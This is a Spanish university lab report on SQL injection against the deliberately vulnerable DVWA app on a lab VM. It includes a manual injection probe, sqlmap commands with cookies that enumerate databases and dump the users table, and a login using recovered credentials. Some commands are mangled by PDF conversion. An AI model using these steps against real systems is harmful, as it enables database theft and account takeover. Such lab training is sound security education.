Práctica-Ataques Dvwa Con La Técnica SQL Injection

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 10

ESCUELA SUPERIOR POLITÉCNICA AGROPECUARIA DE MANABÍ

MANUEL FÉLIX LÓPEZ

CARRERA COMPUTACIÓN

SEMESTRE NOVENO PERIÓDO MAR-OCT/2020

AUDITORÍA INFORMÁTICA

TEMA:
ATAQUES SOBRE LA APLICACIÓN DVWA UTILIZANDO LA
TÉCNICA DE SQL INJECTION.

AUTORA:
MARÍA M. BRAVO MEZA
MARIO G. VALLEJO REINOSO
JOSÉ R. VÉLEZ MERA
OLIVER A. VERA SALAZAR

FACILITADOR:
ING. AURA D. ZAMBRANO RENDÓN

CALCETA, JULIO 2020


ACTIVIDAD

Se deben realizar diversos ataques sobre la aplicación DVWA utilizando la técnica


de SQL injection. Para ello, se debe utilizar la herramienta SQLMap (instalada en
Kali por defecto). Se valorará positivamente la explicación de los pasos seguidos
para la realización de cada ataque.
SE TIENE QUE:

• Indicar cuál/cuáles son los parámetros vulnerables de la URL.


• Obtener los nombres de las bases de datos disponibles.
• Recuperar los nombres de las tablas de la base de datos DVWA.
• Recuperar el contenido de las tablas de la base de datos DVWA.
SOLUCIÓN

Para el desarrollo de esta actividad utilizaremos un entorno virtual con dos


máquinas virtuales, siendo la primera la máquina victima (Metasploitable) ya que
tiene configurada la aplicación DVWA y como máquina atacante (Kali Linux) la
misma que tiene instalado SQLMAP.

PASOS.

1.- Verificar la IP de la máquina Metasploitable

2. Desde la máquina atacante accedemos a un navegador web de preferencia


Firefox y digitamos la dirección de la máquina víctima para el caso 192.168.0.102
y seleccionamos la aplicación DVWA
3. Se mostrará la siguiente pantalla. Las credenciales para el acceso son:

Username: admin

Password: password

4. Vista de la página de inicio de DVWA

5. Se debe bajar el nivel de seguridad de la aplicación, ya que entre más bajo sea
el nivel más fácil y rápido se podrá ejecutar la inyección
INDICAR CUÁLES SON LOS PARÁMETROS VULNERABLES DE LA URL

6.- Comprobar que existe información en la base de datos.

7. Indicar cuáles son los parámetros vulnerables de la URL.

Se lo realiza ingresando la sentencia ?id='q&Submit=Submit# en la URL, y si da


como resultado un error SQL, entonces es vulnerable.
8. Ingresar a la aplicación SQLMap de Kali Linux.

OBTENER LOS NOMBRES DE LAS BASES DE DATOS DISPONIBLES

9. Con la ayuda del complemento de Firefox “Http Header Live” obtenemos el


User-Agent y las Cookies necesarias para utilizar SQLMap.

10. Ejecutamos la siguiente sentencia para que nos muestre las bases de datos
disponibles.

sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;


rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low"
PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u
http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
–-dbs
11. Terminada la ejecución de la acción indicada, nos muestra 7 bases de datos
encontradas:

RECUPERAR LOS NOMBRES DE LAS TABLAS DE LA BASE DE DATOS

12. Recuperar los nombres de las tablas de la base de datos dvwa.

Para recuperar los nombres de la base de datos DVWA, ingresamos la sentencia:

sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;


rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low"
PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u
http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
–D dvwa –-tables

13.- Nos muestra dos tablas de datos DVWA

RECUPERAR EL CONTENIDO DE LAS TABLAS DE LA BASE DE DATOS


DVWA.

14. Obtener el contenido de guestbook y users

Tabla guestbook:

Utilizamos la siguiente sentencia para obtener el contenido de ésta tabla:

sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;


rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low"
PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u
http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
–batch –dump –T guestbook –D dvwa
El contenido de la table nos muestra lo siguiente

Tabla users

De igual forma se usa la misma sentencia, pero cambiamos el nombre de la tabla,


así:

sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;


rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low"
PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u
http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
–batch –dump –T users –D dvwa

Además de mostrarnos el contenido, nos indica que el contenido de la tabla users


tiene encriptación md5.

El contenido de la tabla es el siguiente:


VERIFICACIÓN DE USUARIOS OBTENIDOS'

15. Ingresamos a la aplicación con las credenciales obtenidas en la tabla users.

Para este caso se ha ingresado con las credenciales del usuario 2.

user:gordonb

password:abc123

17. Como podemos observar hemos podido acceder a la aplicación con las
credenciales obtenidas

También podría gustarte